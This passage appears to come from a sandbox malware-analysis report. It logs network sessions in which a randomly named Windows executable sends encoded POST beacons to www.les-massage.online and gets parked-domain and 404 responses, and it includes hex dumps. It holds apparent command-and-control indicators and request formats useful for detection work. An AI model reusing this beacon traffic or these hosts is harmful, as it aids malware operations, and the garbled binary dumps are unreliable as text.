                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                                                Sep 22, 2024 17:43:17.125184059 CEST1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                                                Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                                                Sep 22, 2024 17:43:17.125221014 CEST1236INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                                                Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                                                Sep 22, 2024 17:43:17.125252962 CEST1236INData Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                                                Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                                                                Sep 22, 2024 17:43:17.125288010 CEST1236INData Raw: 65 6c 63 6f 6d 65 2f 69 6d 61 67 65 73 2f 68 6f 73 74 69 6e 67 65 72 2d 6c 6f 67 6f 2e 73 76 67 20 61 6c 74 3d 48 6f 73 74 69 6e 67 65 72 20 77 69 64 74 68 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c
                                                                Data Ascii: elcome/images/hostinger-logo.svg alt=Hostinger width=120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidd
                                                                Sep 22, 2024 17:43:17.125319958 CEST1236INData Raw: 78 20 63 6f 6c 75 6d 6e 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d
                                                                Data Ascii: x column-wrap"><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and
                                                                Sep 22, 2024 17:43:17.125359058 CEST1236INData Raw: 28 29 7b 74 68 69 73 2e 75 74 66 31 36 3d 7b 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 2c 65 2c 6e 3d 5b 5d 2c 74 3d 30 2c 61 3d 6f 2e 6c 65 6e 67 74 68 3b 74 3c 61 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d
                                                                Data Ascii: (){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023
                                                                Sep 22, 2024 17:43:17.125689030 CEST1236INData Raw: 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 32 29 22 29 3b 69 66 28 73 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 70 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72
                                                                Data Ascii: ("punycode_bad_input(2)");if(s>Math.floor((r-f)/p))throw RangeError("punycode_overflow(1)");if(f+=s*p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Mat
                                                                Sep 22, 2024 17:43:17.125726938 CEST524INData Raw: 77 5b 64 5d 3f 31 3a 30 29 29 29 2c 75 3d 6e 28 66 2c 69 2b 31 2c 69 3d 3d 63 29 2c 66 3d 30 2c 2b 2b 69 7d 7d 2b 2b 66 2c 2b 2b 68 7d 72 65 74 75 72 6e 20 79 2e 6a 6f 69 6e 28 22 22 29 7d 2c 74 68 69 73 2e 54 6f 41 53 43 49 49 3d 66 75 6e 63 74
                                                                Data Ascii: w[d]?1:0))),u=n(f,i+1,i==c),f=0,++i}}++f,++h}return y.join("")},this.ToASCII=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                37192.168.2.649761194.58.112.174804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:43:22.618366957 CEST701OUTPOST /74ou/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.les-massage.online
                                                                Origin: http://www.les-massage.online
                                                                Referer: http://www.les-massage.online/74ou/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 36 6b 4f 73 6f 5a 42 31 59 78 41 76 69 35 43 59 42 47 6c 2b 76 46 50 42 4a 75 73 39 74 4e 43 76 53 4e 58 46 5a 43 63 45 44 52 67 61 54 52 76 52 66 58 6b 35 6e 59 6b 32 61 50 4a 41 52 62 4f 65 38 4e 44 35 74 37 36 4f 6a 70 61 33 4f 48 4e 5a 4d 53 45 2f 2b 67 39 61 48 71 6c 68 53 71 77 39 58 68 48 4d 48 2b 6f 47 2b 38 69 76 59 75 6a 6e 61 63 65 4f 43 66 6d 47 65 68 37 69 39 43 68 38 33 58 47 67 45 45 72 41 63 39 46 35 4f 79 64 68 57 43 6e 50 34 4b 4b 74 78 42 67 55 50 34 45 34 6e 65 48 70 79 72 2f 39 6d 49 59 75 2b 69 43 6f 66 38 57 4e 73 39 2f 6d 37 5a 6d 4c 4d 6b 4a 38 47 35 6e 6f 66 6e 43 41 55 6e 4d 79
                                                                Data Ascii: i4fTbV=6kOsoZB1YxAvi5CYBGl+vFPBJus9tNCvSNXFZCcEDRgaTRvRfXk5nYk2aPJARbOe8ND5t76Ojpa3OHNZMSE/+g9aHqlhSqw9XhHMH+oG+8ivYujnaceOCfmGeh7i9Ch83XGgEErAc9F5OydhWCnP4KKtxBgUP4E4neHpyr/9mIYu+iCof8WNs9/m7ZmLMkJ8G5nofnCAUnMy
                                                                Sep 22, 2024 17:43:23.348138094 CEST1236INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:43:23 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Content-Encoding: gzip
                                                                Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 55 68 0c 20 b4 ec 2a d3 f7 5c c7 53 75 4b d7 d6 f1 a5 2f 02 e5 36 4a 61 34 46 bb 9e 52 98 68 a0 3a 8e 6c 94 a4 eb 96 44 2f 50 1b b9 b8 2c 9e 21 47 91 6f da 61 88 49 26 fd 1d 2c 24 6b bd 21 21 99 ef 99 f8 b3 ba 5c 12 a4 41 28 6c 80 f9 ad 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba 7e fe [TRUNCATED]
                                                                Data Ascii: e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktUh *\SuK/6Ja4FRh:lD/P,!GoaI&,$k!!\A(l+7lC;pQ:V?~KYGoQ 7hgGUW]<ftt0y4JHPad%WAPvTv<6,#mSQd4b~gama+|\|j-"RAqnj4T=E}\DL$x7 ;TJ=mj3h,[J~xA!hv3y?YdnabJ}pAS[FlF#d0S6NmX`j(-dr>\4nz;h`d`=>\(|/4`+!3~b;+&j9Rs4CP-3="i?k;jo,u8X%9W+GohB(O?NN,OmYhI@~jAf4d_"NkPiao#gpPzsp;opt*P9*LEd>=TV'tUq{''b)eM+nw*RB [TRUNCATED]
                                                                Sep 22, 2024 17:43:23.348417997 CEST224INData Raw: 1a 7d 4f db a7 b3 4e cc 5f a0 59 17 b9 55 d0 75 bc 96 ab 36 22 43 fb 37 26 8c 02 df eb 3e dd 28 e0 64 c0 dd a6 90 f6 2f a0 17 f1 0b ea 7d 1c df 03 ce 78 84 29 ae 9d 75 5f ad 9c 70 d4 d6 26 cf 25 69 fb 60 bd 01 22 a6 a7 30 ee 9f 11 07 ef 27 5f c2
                                                                Data Ascii: }ON_YUu6"C7&>(d/}x)u_p&%i`"0'_E'`&Iu$(Oud4N&Hz_2&Irk>P$G!+b8)o3BknQ.\#9Z/C
                                                                Sep 22, 2024 17:43:23.348432064 CEST1236INData Raw: d0 ff 24 1f 62 45 3b f1 03 c8 b6 8b 85 60 11 c9 6d 41 69 4e 5a 80 c4 87 1d 33 ad a0 08 4a 0b de c1 ff 07 b4 c6 2c b4 42 03 c9 27 ac 05 f6 65 68 29 fe 0e 6a 41 db 1f 7e bd ff c6 dc 64 0d 06 e3 41 ab fd 53 f2 79 6a d6 7b 6c cd 74 99 4c 42 3b f1 23
                                                                Data Ascii: $bE;`mAiNZ3J,B'eh)jA~dASyj{ltLB;#dvxiXrA{oYyV.l+xv:0>K1R1,MtR709y\GFWmNN[0M#>%NwHiet @n*'RVK=}Jc`if*C
                                                                Sep 22, 2024 17:43:23.348671913 CEST1126INData Raw: 3d 25 2e 28 70 a5 50 15 d3 8d a8 7d a0 70 2a e7 ad 4c 75 be 7e 64 ea eb 64 2c 5c 70 b4 9c ce dc 71 36 65 20 e8 4e 20 c4 95 2b ae be 47 03 5c 40 99 bf 1b a9 60 bc a6 5c 90 bf 1f 9c 73 dd 8a 28 cb b2 a8 4e cf 46 52 6c f8 01 e4 a5 31 1c f4 3f b1 82
                                                                Data Ascii: =%.(pP}p*Lu~dd,\pq6e N +G\@`\s(NFRl1?u=nC, OMx6j*t~fzCT/9u.9JkF2CNQ5>eRg)p^sRR7:HnM/xP)Sruz


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                38192.168.2.649762194.58.112.174804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:43:25.167112112 CEST725OUTPOST /74ou/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.les-massage.online
                                                                Origin: http://www.les-massage.online
                                                                Referer: http://www.les-massage.online/74ou/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 36 6b 4f 73 6f 5a 42 31 59 78 41 76 69 61 4b 59 4e 42 78 2b 74 6c 50 41 51 65 73 39 30 39 43 72 53 4e 4c 46 5a 41 77 71 44 44 45 61 53 30 4c 52 65 56 63 35 71 34 6b 32 4f 66 4a 46 65 37 4f 6a 38 4e 4f 4d 74 36 47 4f 6a 71 6d 33 4f 47 39 5a 4d 6c 6f 34 78 51 39 45 49 4b 6c 6a 4e 61 77 39 58 68 48 4d 48 2b 39 64 2b 38 71 76 59 65 54 6e 62 39 65 50 4b 2f 6d 46 5a 68 37 69 72 43 67 33 33 58 47 4f 45 46 6e 6d 63 37 4a 35 4f 7a 74 68 48 32 37 51 79 4b 4b 72 39 52 68 6a 66 36 74 52 71 73 4b 75 78 36 48 42 30 36 70 4f 2f 55 44 79 44 50 57 75 2b 74 66 6b 37 62 2b 35 4d 45 4a 57 45 35 66 6f 4e 77 4f 6e 62 54 70 52 43 6b 58 76 4f 56 56 30 69 54 35 53 64 38 71 6a 54 4f 78 6c 45 41 3d 3d
                                                                Data Ascii: i4fTbV=6kOsoZB1YxAviaKYNBx+tlPAQes909CrSNLFZAwqDDEaS0LReVc5q4k2OfJFe7Oj8NOMt6GOjqm3OG9ZMlo4xQ9EIKljNaw9XhHMH+9d+8qvYeTnb9ePK/mFZh7irCg33XGOEFnmc7J5OzthH27QyKKr9Rhjf6tRqsKux6HB06pO/UDyDPWu+tfk7b+5MEJWE5foNwOnbTpRCkXvOVV0iT5Sd8qjTOxlEA==
                                                                Sep 22, 2024 17:43:25.880189896 CEST1236INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:43:25 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Content-Encoding: gzip
                                                                Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 55 68 0c 20 b4 ec 2a d3 f7 5c c7 53 75 4b d7 d6 f1 a5 2f 02 e5 36 4a 61 34 46 bb 9e 52 98 68 a0 3a 8e 6c 94 a4 eb 96 44 2f 50 1b b9 b8 2c 9e 21 47 91 6f da 61 88 49 26 fd 1d 2c 24 6b bd 21 21 99 ef 99 f8 b3 ba 5c 12 a4 41 28 6c 80 f9 ad 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba 7e fe [TRUNCATED]
                                                                Data Ascii: e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktUh *\SuK/6Ja4FRh:lD/P,!GoaI&,$k!!\A(l+7lC;pQ:V?~KYGoQ 7hgGUW]<ftt0y4JHPad%WAPvTv<6,#mSQd4b~gama+|\|j-"RAqnj4T=E}\DL$x7 ;TJ=mj3h,[J~xA!hv3y?YdnabJ}pAS[FlF#d0S6NmX`j(-dr>\4nz;h`d`=>\(|/4`+!3~b;+&j9Rs4CP-3="i?k;jo,u8X%9W+GohB(O?NN,OmYhI@~jAf4d_"NkPiao#gpPzsp;opt*P9*LEd>=TV'tUq{''b)eM+nw*RB [TRUNCATED]
                                                                Sep 22, 2024 17:43:25.880244017 CEST224INData Raw: 1a 7d 4f db a7 b3 4e cc 5f a0 59 17 b9 55 d0 75 bc 96 ab 36 22 43 fb 37 26 8c 02 df eb 3e dd 28 e0 64 c0 dd a6 90 f6 2f a0 17 f1 0b ea 7d 1c df 03 ce 78 84 29 ae 9d 75 5f ad 9c 70 d4 d6 26 cf 25 69 fb 60 bd 01 22 a6 a7 30 ee 9f 11 07 ef 27 5f c2
                                                                Data Ascii: }ON_YUu6"C7&>(d/}x)u_p&%i`"0'_E'`&Iu$(Oud4N&Hz_2&Irk>P$G!+b8)o3BknQ.\#9Z/C
                                                                Sep 22, 2024 17:43:25.880319118 CEST1236INData Raw: d0 ff 24 1f 62 45 3b f1 03 c8 b6 8b 85 60 11 c9 6d 41 69 4e 5a 80 c4 87 1d 33 ad a0 08 4a 0b de c1 ff 07 b4 c6 2c b4 42 03 c9 27 ac 05 f6 65 68 29 fe 0e 6a 41 db 1f 7e bd ff c6 dc 64 0d 06 e3 41 ab fd 53 f2 79 6a d6 7b 6c cd 74 99 4c 42 3b f1 23
                                                                Data Ascii: $bE;`mAiNZ3J,B'eh)jA~dASyj{ltLB;#dvxiXrA{oYyV.l+xv:0>K1R1,MtR709y\GFWmNN[0M#>%NwHiet @n*'RVK=}Jc`if*C
                                                                Sep 22, 2024 17:43:25.880354881 CEST1126INData Raw: 3d 25 2e 28 70 a5 50 15 d3 8d a8 7d a0 70 2a e7 ad 4c 75 be 7e 64 ea eb 64 2c 5c 70 b4 9c ce dc 71 36 65 20 e8 4e 20 c4 95 2b ae be 47 03 5c 40 99 bf 1b a9 60 bc a6 5c 90 bf 1f 9c 73 dd 8a 28 cb b2 a8 4e cf 46 52 6c f8 01 e4 a5 31 1c f4 3f b1 82
                                                                Data Ascii: =%.(pP}p*Lu~dd,\pq6e N +G\@`\s(NFRl1?u=nC, OMx6j*t~fzCT/9u.9JkF2CNQ5>eRg)p^sRR7:HnM/xP)Sruz


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                39192.168.2.649763194.58.112.174804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:43:27.706856012 CEST1738OUTPOST /74ou/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.les-massage.online
                                                                Origin: http://www.les-massage.online
                                                                Referer: http://www.les-massage.online/74ou/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 36 6b 4f 73 6f 5a 42 31 59 78 41 76 69 61 4b 59 4e 42 78 2b 74 6c 50 41 51 65 73 39 30 39 43 72 53 4e 4c 46 5a 41 77 71 44 44 4d 61 54 48 7a 52 63 79 77 35 6c 59 6b 32 4e 66 4a 45 65 37 4f 45 38 4e 57 49 74 36 4b 30 6a 76 71 33 4e 6b 31 5a 4b 52 38 34 6d 41 39 45 4b 4b 6c 67 53 71 78 31 58 67 33 41 48 2b 74 64 2b 38 71 76 59 63 37 6e 53 4d 65 50 49 2f 6d 47 65 68 37 75 39 43 68 51 33 58 2b 34 45 46 7a 51 63 72 70 35 4f 54 39 68 46 6c 54 51 76 61 4b 70 38 68 68 37 66 36 78 4b 71 73 57 45 78 36 6a 72 30 36 4e 4f 2f 77 61 61 51 4d 57 6d 6f 74 50 6c 6f 62 36 4a 45 42 42 68 46 5a 54 7a 44 68 43 77 58 69 4e 69 4b 55 66 73 4c 6c 55 32 6f 6a 64 2b 58 62 48 39 58 4d 30 4c 54 73 4a 7a 78 77 65 73 6b 30 67 78 50 62 50 66 63 2f 7a 7a 65 52 42 45 6c 4c 32 57 78 7a 2b 31 66 39 33 79 4f 62 51 64 76 6a 4f 4d 44 6a 51 4f 4f 55 38 34 58 78 5a 54 34 37 48 43 6d 57 38 4e 7a 4d 63 56 43 38 6d 2f 6d 57 46 45 2f 45 45 51 56 70 6e 31 76 2b 7a 6e 43 42 30 31 79 73 34 67 6a 51 6e 6a 32 35 49 52 7a 4c 62 [TRUNCATED]
                                                                Data Ascii: i4fTbV=6kOsoZB1YxAviaKYNBx+tlPAQes909CrSNLFZAwqDDMaTHzRcyw5lYk2NfJEe7OE8NWIt6K0jvq3Nk1ZKR84mA9EKKlgSqx1Xg3AH+td+8qvYc7nSMePI/mGeh7u9ChQ3X+4EFzQcrp5OT9hFlTQvaKp8hh7f6xKqsWEx6jr06NO/waaQMWmotPlob6JEBBhFZTzDhCwXiNiKUfsLlU2ojd+XbH9XM0LTsJzxwesk0gxPbPfc/zzeRBElL2Wxz+1f93yObQdvjOMDjQOOU84XxZT47HCmW8NzMcVC8m/mWFE/EEQVpn1v+znCB01ys4gjQnj25IRzLbyL43XpsTgoRrlXRaT/0DSlo04p+qaqldhS/R/lHfsKnX7RFhnnz/qF8aKzXmTkjXnlmJNBLdyjUHa4IXSRajWQ7seLJ3zLzzTLfFEzya9YAljmfb3vDlQEmDCSLAzZEwhzm7xIaprwOjnGhjf4AsDVloXwQpNAqvECbs1ugR/0sei7Lxz6EwfytHUZqvpHysOjmAqIKZ+lDrHYcqOHZ5TNNXaa2OP/bEpXAoKgttw21pM1ThILXWcvGmdP2naihCkfVCzsKU6+uUgNUTGmvhnK/sEaLM/aOfboB4GwuZ1V344mwlVdIY8p9agrnGhl//pWavRQlpdvdond5T1Wexk+e+z9Ai7zIs3HTTng1mCuJZV1V2jIKtsUWE4ddrtu+5A0VQkdDYRXn4LNiI4FHbYKRB2PSPHiw0drjYlRcKGm7QdXBggOcmooPLemN+/FXOTD7nRXKLGfWsquLPPVgu9f9BDD8H+fLkW6l0z5kZEgvvEYh7QSwBHyFM+6pOgNJcnvFBvZEeTZGEeObHe0P0XXu0uFouCOhy17tUdDdOVllmbXF0k239a/4BiHWK2Nfrw5rBSgij9ha31rkfP0JfzahDjyepB03fU9PHEWUksF8Z6AvQ5n1sf9wP7YrYO639wu+dRHA5xlcWMZW3R/5MiQ4/BJOyLeDA6s [TRUNCATED]
                                                                Sep 22, 2024 17:43:28.381593943 CEST1236INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:43:28 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Content-Encoding: gzip
                                                                Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 55 68 0c 20 b4 ec 2a d3 f7 5c c7 53 75 4b d7 d6 f1 a5 2f 02 e5 36 4a 61 34 46 bb 9e 52 98 68 a0 3a 8e 6c 94 a4 eb 96 44 2f 50 1b b9 b8 2c 9e 21 47 91 6f da 61 88 49 26 fd 1d 2c 24 6b bd 21 21 99 ef 99 f8 b3 ba 5c 12 a4 41 28 6c 80 f9 ad 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba 7e fe [TRUNCATED]
